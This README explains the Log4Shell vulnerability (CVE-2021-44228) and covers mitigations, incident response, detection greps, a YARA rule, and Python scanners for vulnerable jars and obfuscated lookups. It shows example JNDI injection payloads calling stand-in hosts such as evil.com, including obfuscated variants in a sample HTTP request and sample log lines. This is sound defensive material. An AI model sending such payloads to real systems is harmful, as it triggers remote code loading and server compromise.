Associated Vulnerability

**Title:** Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)

**Description:** Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
CVE-2021-44228
Readme
# 💥 CVE-2021-44228 — **Log4Shell**
### *The Most Impactful Vulnerability of the Decade (Discovered Dec 2021)*

---
## 🧠 **Quick Summary**
| Item | Detail |
| ------------------ | ------------------------------------------------ |
| **CVE ID** | CVE-2021-44228 |
| **Nickname** | *Log4Shell* |
| **Component** | Apache **Log4j 2** (2.0-beta9 → 2.14.1) |
| **Type** | Remote Code Execution (RCE) |
| **CVSS v3 Score** | 💣 **10.0 / 10.0 (Critical)** |
| **Discovery Date** | December 2021 |
| **Patched In** | Log4j 2.15.0 and later (recommended: 2.17.1 +) |
| **Attack Surface** | Any system that logs untrusted input using Log4j |
---
## ⚙️ **How It Works**
<img width="1249" height="709" alt="log4j_explanation" src="https://github.com/user-attachments/assets/b608ea1c-7062-4fbf-9786-792f150a0e4b" />
1. Log4j supports **lookups** like `${…}` in log messages.
2. When it sees `${jndi:ldap://attacker.com/a}`, it performs a **JNDI lookup**.
3. The lookup can retrieve a **remote Java class** from the attacker’s server.
4. That class executes inside your application — giving the attacker **remote control**.
💡 **One malicious string in a log = full server compromise.**
---
## ⚔️ **Example Attack**

```http
GET /login HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://evil.com/exploit}
```
➡️ When the app logs this header, Log4j performs a lookup and loads the attacker’s code.
---
## 🧩 **Affected Versions**
```
✅ Safe: Log4j ≥ 2.17.1
⚠️ Vulnerable: 2.0-beta9 → 2.14.1
```
> 🧾 Always confirm the latest release on [Apache’s official download page](https://logging.apache.org/log4j/2.x/download.html).
---
## 🚀 **Timeline**
| Date | Event |
| ------------------ | --------------------------------------------- |
| 🗓️ Nov 24 2021 | Vulnerability reported privately to Apache |
| 🗓️ Dec 9 2021 | Public disclosure & widespread exploitation |
| 🩹 Dec 10 2021 | Patch 2.15.0 released |
| 🛠️ Dec 14-20 2021 | Further fixes: CVE-2021-45046 / 45105 / 44832 |
| 🧩 2022–2025 | Continuous updates & vendor mitigations |
---
## 🧱 **Root Cause**
* Log4j allowed **message lookup substitution** via `${…}`.
* The **JNDI lookup** functionality permitted **remote code loading** through LDAP, RMI, or other protocols.
* Result: attacker-controlled input → code execution in the JVM.
---
## 🛡️ **Mitigation Matrix**
| Priority | Action | Command / Note |
| -------------------------- | ----------------------------------- | ---------------------------------------------------------------------------------- |
| ⭐ **1. Upgrade (Best)** | Upgrade Log4j to latest (2.17.1 +). | `mvn dependency:tree` → find → update dependency |
| ⚡ **2. Remove Class** | Delete `JndiLookup.class` from jar. | `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class` |
| 🧩 **3. Temp Property** | Disable lookups (limited effect). | `-Dlog4j2.formatMsgNoLookups=true` |
| 🧱 **4. Network Controls** | Block outbound LDAP/RMI traffic. | via firewall or egress ACL |
| 🧰 **5. WAF / IDS Rules** | Block `${jndi:` payloads. | add to ModSecurity / Snort rules |
---
## 🔍 **Detection & Hunting**
### 🔎 Search for Injection Attempts
```bash
grep -R "\${jndi:" /var/log/* 2>/dev/null
```
### 🌐 Network Indicators
* Outbound connections to strange LDAP/RMI/DNS hosts.
* Unusual traffic on 389 (LDAP), 1099 (RMI), 1389, or 53 (DNS).
### 🕵️ Common Payload Patterns
<img width="1920" height="957" alt="nessus3" src="https://github.com/user-attachments/assets/ae2be0c1-1502-4170-a24f-64e286aa696a" />
```
${jndi:ldap://attacker.com/a}
${${lower:j}${upper:ndi}:ldap://evil.com/b}
```
<img width="1920" height="959" alt="nessus4" src="https://github.com/user-attachments/assets/543c5f93-535e-42c6-9f3c-eb094c3ec722" />
<img width="1920" height="958" alt="nessus5" src="https://github.com/user-attachments/assets/508a3130-3529-4082-a118-b6ac8d479942" />
*(attackers obfuscate to bypass filters)*
---
## 🔦 **Incident Response Playbook**
| Step | Task | Description |
| ---- | ------------------- | ------------------------------------------------ |
| 1️⃣ | **Identify** | Locate all Log4j jars in apps/containers. |
| 2️⃣ | **Prioritize** | Internet-facing or high-privilege systems first. |
| 3️⃣ | **Contain** | Remove access, isolate servers if compromised. |
| 4️⃣ | **Mitigate** | Apply fixes or remove vulnerable classes. |
| 5️⃣ | **Hunt IOCs** | Search for `${jndi:` and outbound LDAP traffic. |
| 6️⃣ | **Patch & Restart** | Upgrade to safe versions and redeploy. |
| 7️⃣ | **Verify** | Re-scan and monitor for exploitation. |
---
## 🧰 **Helpful Commands**
```bash
# Locate log4j-core jars by file name (a log4j-core nested inside a war/ear or
# shaded into a fat jar is NOT found this way; inspect archive contents for those)
find / -type f -name "log4j-core-*.jar" 2>/dev/null
# Remove the dangerous class; null-delimited loop so paths with spaces survive
find / -type f -name 'log4j-core-*.jar' -print0 2>/dev/null |
while IFS= read -r -d '' j; do
  zip -q -d "$j" org/apache/logging/log4j/core/lookup/JndiLookup.class && echo "patched $j"
done
# Hunt suspicious patterns in plain and gzip-rotated logs
# (zgrep takes files, not directories, so feed it the files via find)
find /var/log -type f -exec zgrep -n '\${jndi:' {} + 2>/dev/null
```
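The `find / -name "log4j-core-*.jar"` command above only sees jars that sit on disk under their own name; log4j-core bundled inside a `.war`/`.ear` or a fat application jar is missed, and a jar whose `JndiLookup.class` was already deleted still matches by name. The following scanner is an added example (not part of this README or the linked logpresso tool): it opens every archive under a directory, recurses into embedded archives, reads the log4j-core version from Maven's `pom.properties`, checks for the `JndiLookup.class` entry, and reports `fixed` / `mitigated` / `VULNERABLE` using the fixed releases named in the advisory text at the top of this page (2.17.1+, 2.12.2+, 2.3.1+). The `build_demo_fixture` archives are constructed stand-ins with a few stub bytes in place of real class files; `MAX_NESTING` and the verdict labels are this example's own choices.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

# Real entry names inside log4j-core jars: the class this page's zip -d command
# deletes, and the Maven properties file that records the artifact version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED_EXT = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 4  # assumption: war -> fat jar -> lib jar is as deep as we expect


def is_fixed_release(version: Optional[str]) -> bool:
    """Releases the advisory lists as not affected by CVE-2021-44228:
    2.17.1+ (this page's recommendation) plus the back-ports 2.12.2+ and 2.3.1+."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")  # '2.0-beta9' -> (2, 0, 0)
    if not m or int(m.group(1)) != 2:
        return False  # unparseable or 1.x: flag for manual review
    minor, patch = int(m.group(2)), int(m.group(3) or 0)
    if minor == 3:
        return patch >= 1
    if minor == 12:
        return patch >= 2
    return (minor, patch) >= (17, 1)


def _version_from_pom(zf: zipfile.ZipFile, names: set) -> Optional[str]:
    if POM_PROPS not in names:
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_archive(zf: zipfile.ZipFile, label: str, findings: List[Dict], depth: int = 0) -> None:
    """Record log4j-core evidence in this archive, then recurse into embedded archives."""
    names = set(zf.namelist())
    version = _version_from_pom(zf, names)
    jndi_present = JNDI_CLASS in names
    if version is not None or jndi_present:
        if is_fixed_release(version):
            verdict = "fixed"
        elif not jndi_present:
            verdict = "mitigated"  # class deleted: the emergency fix described on this page
        else:
            verdict = "VULNERABLE"
        findings.append({"archive": label, "version": version,
                         "jndi_lookup_present": jndi_present, "verdict": verdict})
    if depth >= MAX_NESTING:
        return
    for name in sorted(names):
        if name.lower().endswith(NESTED_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                inspect_archive(inner, f"{label}!{name}", findings, depth + 1)


def scan_path(root: str) -> List[Dict]:
    """Walk a directory tree and inspect every jar/war/ear, including nested ones."""
    findings: List[Dict] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(NESTED_EXT):
                path = os.path.join(dirpath, fn)
                try:
                    with zipfile.ZipFile(path) as zf:
                        inspect_archive(zf, path, findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def build_demo_fixture() -> str:
    """CONSTRUCTED stand-in archives for a demo run (stub bytes instead of real class files)."""
    def make(entries: Dict[str, object]) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            for name, data in entries.items():
                zf.writestr(name, data)
        return buf.getvalue()
    stub_class = b"\xca\xfe\xba\xbe"
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(make({POM_PROPS: "version=2.14.1\n", JNDI_CLASS: stub_class}))
    with open(os.path.join(root, "log4j-core-stripped.jar"), "wb") as f:
        f.write(make({POM_PROPS: "version=2.14.1\n"}))  # JndiLookup.class already deleted
    with open(os.path.join(root, "app.war"), "wb") as f:  # fixed jar hidden one level down
        f.write(make({"WEB-INF/lib/log4j-core-2.17.1.jar":
                      make({POM_PROPS: "version=2.17.1\n", JNDI_CLASS: stub_class})}))
    return root


def scan_demo() -> Dict[str, Dict]:
    """Scan the constructed fixture; key each finding by the archive's base name."""
    return {os.path.basename(f["archive"]): f for f in scan_path(build_demo_fixture())}
```

Run `scan_path("/opt/myapp")` against a real deployment root; the `archive` field uses `outer.war!inner.jar` labels so a nested hit can be traced back to the file that actually needs rebuilding. Note that shaded fat jars that relocate the Log4j packages will not match `JNDI_CLASS` or `POM_PROPS` by name, so a clean result from this scan is not proof of absence.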
---
## 🧾 **Follow-On Vulnerabilities**
| CVE | Issue | Severity |
| -------------- | ------------------------ | ----------- |
| CVE-2021-44228 | Original RCE (Log4Shell) | 🔴 Critical |
| CVE-2021-45046 | Patch bypass → RCE | 🔴 Critical |
| CVE-2021-45105 | DoS via recursion | 🟠 High |
| CVE-2021-44832 | Config-based RCE | 🟠 High |
---
## 🏗️ **Impact Scope**
* **Millions** of apps: Minecraft servers, enterprise Java apps, Apache Solr, Kafka, Elasticsearch, Jenkins, and many cloud services.
* **Attackers** exploited it within hours of disclosure.
* **Global response:** CISA, Microsoft, AWS, Cloudflare, and others issued emergency advisories.
---
## 🔒 **Long-Term Defense**
1. Maintain a **Software Bill of Materials (SBOM)**.
2. Automate **dependency scanning** (Snyk, Dependency-Check, Trivy).
3. Isolate logging frameworks and limit egress.
4. Implement a **zero-trust egress policy**.
5. Regularly patch all third-party dependencies.
---
## 📚 **Key References**
* 🧩 [Apache Log4j Security Page](https://logging.apache.org/log4j/2.x/security.html)
* 🔐 [NVD CVE-2021-44228 Entry](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
* 🧰 [CISA Guidance & Affected-Software DB](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance)
* 🏢 [Microsoft Security Blog Response](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228)
---
## 🧭 **TL;DR for Teams**
> “Check every Java service.
> If Log4j 2.x ≤ 2.14.1 → upgrade now.
> If can’t upgrade → remove `JndiLookup.class` + block LDAP/RMI.
> Scan logs for `${jndi:`.
> Don’t sleep until patched.”
---
## 🛡️ **Mitigation Cheat Sheet**
| **Action** | **Command / Step** |
|-------------------------------------|--------------------|
| **Upgrade (Best)** | `mvn dependency:tree` → Update to **2.20.0+** |
| **Quick Fix (2.x)** | Set: `log4j2.formatMsgNoLookups=true` |
| **Emergency Patch** | Delete: `org/apache/logging/log4j/core/lookup/JndiLookup.class` |
| **Detect in Code** | Scan with **Snyk**, **OWASP Dependency-Check** |
| **Block Network** | Firewall: Block outbound `389`, `1099`, `1389` |
| **WAF Rule** | Block: `\$\{jndi:(ldap|rmi|dns):.*\}` |
---
## 📅 **Timeline (2021–2025)**
```mermaid
gantt
title Log4Shell Timeline
dateFormat YYYY-MM-DD
section Disclosure
Identified :done, 2021-11-24, 7d
Public Reveal :active, 2021-12-09, 1d
section Patches
2.15.0 (Partial) :done, 2021-12-10, 2d
2.16.0 / 2.17.0 :done, 2021-12-17, 3d
section Ongoing
Legacy Systems Vulnerable :crit, 2022-01-01, 1400d
2025 Status :active, 2025-11-05, 1d
```
---
## 🕵️‍♂️ **Detection Signatures**
```bash
# In logs: fixed-string match on the literal lookup prefix
grep -rF '${jndi:' /var/log/
# HTTP headers (access/proxy logs or captured requests): a lookup anywhere in the User-Agent value
grep -riE 'User-Agent:.*\$\{.*jndi' /var/log/
```
**YARA Rule (Simplified):**
```yara
rule Log4Shell_Payload {
    strings:
        // Un-obfuscated form only; nocase also catches ${JNDI:...} case variants
        $payload = /\$\{jndi:(ldap|rmi|dns|iiop):\/\/[^}]+\}/ nocase
    condition:
        $payload
}
```
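The literal `${jndi:` grep and the YARA rule above catch the plain form, but the "Common Payload Patterns" section shows why they miss real traffic: attackers wrap the keyword in `${lower:…}`, `${upper:…}` and default-value (`${::-j}`) lookups, which Log4j resolves innermost-first before the JNDI lookup ever runs. The following detector is an added example (not part of this README): it emulates that resolution order for the three obfuscating lookups, then matches the unwrapped string case-insensitively, and compares the result against a naive literal grep. The log lines are constructed samples using `.example` hosts; `MAX_DEPTH` is this example's own guard against pathological nesting.

```python
import re
from typing import List, Tuple

# Constructed sample log lines (not from any real incident). Lines 1-4 carry a
# JNDI lookup, lines 5-6 are benign; line 6 contains an unrelated ${...} placeholder.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:ndi}:ldap://evil.example/b}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.example/c}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://evil.example/d}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "price is ${amount} dollars"',
]

# Innermost ${...} (body without nested braces): Log4j resolves these first.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# What the naive grep on this page looks for.
NAIVE_PATTERN = re.compile(r"\$\{jndi:")
# What we hunt for once obfuscation has been unwrapped.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MAX_DEPTH = 16  # assumption: cap on resolution rounds so a crafted line cannot loop forever


def _resolve_inner(match) -> str:
    """Emulate the lookups attackers chain to hide the word 'jndi'."""
    body = match.group(1).strip()
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)          # the payload itself: keep it so it can be matched
    if low.startswith("lower:"):
        return body[6:].lower()        # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[6:].upper()        # ${upper:ndi} -> NDI
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${::-j} or ${env:UNSET:-j} -> j (default-value syntax)
    return match.group(0)              # unknown lookup (date, env, ...): leave untouched


def normalize_lookups(text: str) -> str:
    """Unwrap nested lookups innermost-first until nothing more resolves."""
    for _ in range(MAX_DEPTH):
        resolved = INNERMOST.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI_PATTERN.search(normalize_lookups(line)) is not None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if JNDI_PATTERN.search(norm):
            hits.append((n, norm))
    return hits


def naive_hit_count(lines: List[str]) -> int:
    """How many lines the literal '${jndi:' grep would flag."""
    return sum(1 for line in lines if NAIVE_PATTERN.search(line))


if __name__ == "__main__":
    print(f"naive grep flags {naive_hit_count(SAMPLE_LOG_LINES)} line(s)")
    for n, norm in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: {norm}")
```

Against the six constructed lines the literal grep flags one, the normalizing scanner flags four. Lookups the emulator does not model (`${date:…}`, `${env:…}` with a variable that really exists, `${sys:…}`) are left in place, so a line that hides `jndi` behind one of those still needs a manual look; the point is to stop filtering on the exact spelling of the keyword.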
---
## 🌍 **Global Impact (2021–2025)**
| **Sector** | **Affected** | **Notable Victims** |
|--------------------|--------------|---------------------|
| **Cloud** | 90%+ | AWS, Azure, GCP |
| **Enterprise** | High | Apple, Tesla, Cisco |
| **Gaming** | Yes | **Minecraft** |
| **IoT / Embedded** | Persistent | Routers, DVRs |
> **Still in the Wild (2025):**
> - ~**3.8 million** unpatched instances detected (Shodan, 2024)
> - Used in **state-sponsored attacks** (APT41, etc.)
---
## 🔒 **Final Checklist**
- [ ] **Upgraded Log4j?** → `2.20.0+`
- [ ] **Removed JndiLookup.class?**
- [ ] **Enabled WAF rules?**
- [ ] **Scanned dependencies?**
- [ ] **Monitored outbound LDAP?**
---
> **Log4Shell is not over.**
> It’s the **gift that keeps on giving** — for attackers.
---
**Resources:**
- [Apache Log4j Security](https://logging.apache.org/log4j/2.x/security.html)
- [CISA Alert](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Log4j Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
---
*Stay patched. Stay safe.*
**#Log4Shell #Cybersecurity #ZeroDay**
File Snapshot
```
[4.0K] /data/pocs/796d554c300755b84f86da818de4c931306b176a
└── [ 10K] README.md
1 directory, 1 file
```